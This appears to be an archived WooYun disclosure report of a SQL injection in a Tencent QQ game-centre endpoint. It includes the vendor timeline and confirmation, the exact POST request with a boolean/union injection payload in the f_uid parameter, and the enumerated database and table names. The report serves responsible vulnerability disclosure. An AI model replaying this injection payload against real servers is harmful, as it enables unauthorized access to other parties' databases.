乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-21: 细节已通知厂商并且等待厂商处理中 2015-06-23: 厂商已经确认,细节仅向厂商公开 2015-07-03: 细节向核心白帽子及相关领域专家公开 2015-07-13: 细节向普通白帽子公开 2015-07-23: 细节向实习白帽子公开 2015-08-07: 细节向公众公开
QQ某站点MySQL注射(支持union)
注入点:
POST /json.php?act=addChannel&dir=&mod=ComponentInfo HTTP/1.1Content-Length: 75Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://s.qq.comHost: s.qq.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4Accept: */*f_channel_name=test&f_uid=-1' OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 --
参数f_uid可注入。MySQL union注入。
available databases [6]:[*] db_game_center[*] db_game_center_pre[*] db_gamecenter_app[*] information_schema[*] mysql[*] test
[Done] MySQL user is [email protected]Current db is db_gamecenter_app
Database: db_gamecenter_app[65 tables]+----------------------------------------------+| t_activity_book_cdkey || t_activity_book_info || t_activity_download_info || t_ad_info || t_ad_info_20150613 || t_ad_location_info || t_app_update_check_info || t_business_config || t_business_field_config || t_channel_game_info || t_game_base_lists || t_game_black_list || t_game_broadcast_auto_info || t_game_broadcast_manual_info || t_game_category_info || t_game_channel || t_game_giftparam || t_game_history_popular_list || t_game_history_ranking_list || t_game_id_map || t_game_info || t_game_info_check40 || t_game_info_tmp || t_game_label || t_game_label_info || t_game_must_play_category_game_info || t_game_must_play_category_info || t_game_order_info || t_game_popular_list || t_game_ranking_list || t_game_rating || t_gameorder_hiddenrule || t_gift || t_gift_record || t_id_config || t_id_config_20150603 || t_ios_game_info || t_ios_game_list || t_main_record || t_mga_auto_id || t_mga_channel || t_mga_channel_game || t_mga_game || t_mga_original_game_list || t_mga_user || t_mga_user_white_list || t_operation_log || t_package_name || t_player_recommand_info || t_recommend_category || t_recommend_hotword || t_search_category_map || t_search_log_hotword || t_subject_game_info || t_subject_info || t_sys_msg || t_yyb_game_category_list || t_yyb_game_category_list_cms || t_yyb_game_category_list_cms_all_check_level || t_yyb_game_category_specify_position || t_yyb_game_category_type || t_yyb_game_history_category_list || t_yyb_game_specify_position || tbArticle4Hall || tbGameApk |+----------------------------------------------+
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-06-23 10:54
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
暂无